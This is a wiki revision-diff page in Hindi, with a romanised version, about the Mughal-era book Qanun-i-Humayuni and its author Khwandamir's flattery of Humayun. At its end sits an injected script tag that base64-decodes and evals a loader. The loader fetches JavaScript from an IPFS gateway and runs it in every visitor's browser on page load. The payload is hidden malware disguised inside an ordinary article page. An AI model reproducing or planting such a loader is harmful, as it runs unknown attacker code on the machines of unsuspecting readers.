Difference between revisions of "क़ानून-ए-हुमायूँनी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''क़ानून-ए-हुमायूँनी''' ([[अंग्रेज़ी]]: ''Qanun-i-Humayuni'') ऐतिहासिक पुस्तक है। [[मुग़ल काल]] में इस पुस्तक की रचना खोंदमीर ने की थी।
+
'''क़ानून-ए-हुमायूँनी''' ([[अंग्रेज़ी]]: ''Qanun-i-Humayuni'') ऐतिहासिक पुस्तक है। [[मुग़ल काल]] में इस पुस्तक की रचना [[ख्वांद मीर]] ने की थी।<br />
 
+
<br />
 
*इस किताब में लेखक ने [[हुमायूँ]] की जबर्दस्त चापलूसी की है, जिससे वह [[ग्वालियर]] में मिला था।
 
*इस किताब में लेखक ने [[हुमायूँ]] की जबर्दस्त चापलूसी की है, जिससे वह [[ग्वालियर]] में मिला था।
 
*लेखक द्वारा हुमायूँ को "सिकंदर-ए-आजम" की उपाधि प्रदान की गई थी।
 
*लेखक द्वारा हुमायूँ को "सिकंदर-ए-आजम" की उपाधि प्रदान की गई थी।
 
  
 
{{seealso|मुग़लकालीन शिक्षा एवं साहित्य|बाबरनामा|अकबरनामा|आइना-ए-अकबरी}}
 
{{seealso|मुग़लकालीन शिक्षा एवं साहित्य|बाबरनामा|अकबरनामा|आइना-ए-अकबरी}}

Latest revision as of 19:16, 25 April 2021

qanoon-e-humayooanni (aangrezi: Qanun-i-Humayuni) aitihasik pustak hai. mugal kal mean is pustak ki rachana khvaand mir ne ki thi.

  • is kitab mean lekhak ne humayooan ki jabardast chapaloosi ki hai, jisase vah gvaliyar mean mila tha.
  • lekhak dvara humayooan ko "sikandar-e-ajam" ki upadhi pradan ki gee thi.
  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>